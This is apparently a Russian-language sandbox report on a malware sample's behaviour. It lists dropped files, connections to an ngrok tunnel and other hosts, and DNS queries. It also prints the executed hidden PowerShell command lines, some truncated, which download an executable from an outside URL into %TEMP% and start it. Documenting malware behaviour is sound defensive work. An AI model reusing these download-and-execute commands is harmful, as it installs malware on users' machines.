Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\remote_logo.png
- %TEMP%\bk982491.exe
Сетевая активность
Подключается к
- 'lo########ial-illy.ngrok-free.dev':443
- 'i.##b.co':443
- 'x1.#.lencr.org':80
- 'e7.#.lencr.org':80
- 'vc###ibrary.uk':443
TCP
Запросы HTTP GET
- http://e7.#.lencr.org/110.crl
Другие
- 'lo########ial-illy.ngrok-free.dev':443
- 'i.##b.co':443
- 'vc###ibrary.uk':443
UDP
- DNS ASK lo########ial-illy.ngrok-free.dev
- DNS ASK i.##b.co
- DNS ASK x1.#.lencr.org
- DNS ASK e7.#.lencr.org
- DNS ASK vc###ibrary.uk
Другое
Создает и запускает на исполнение
- '%TEMP%\bk982491.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK982491.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK982491.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK982491.exe; Start-Process -FilePath $env:TEMP\BK982491.exe...
- '%TEMP%\bk982491.exe' (со скрытым окном)
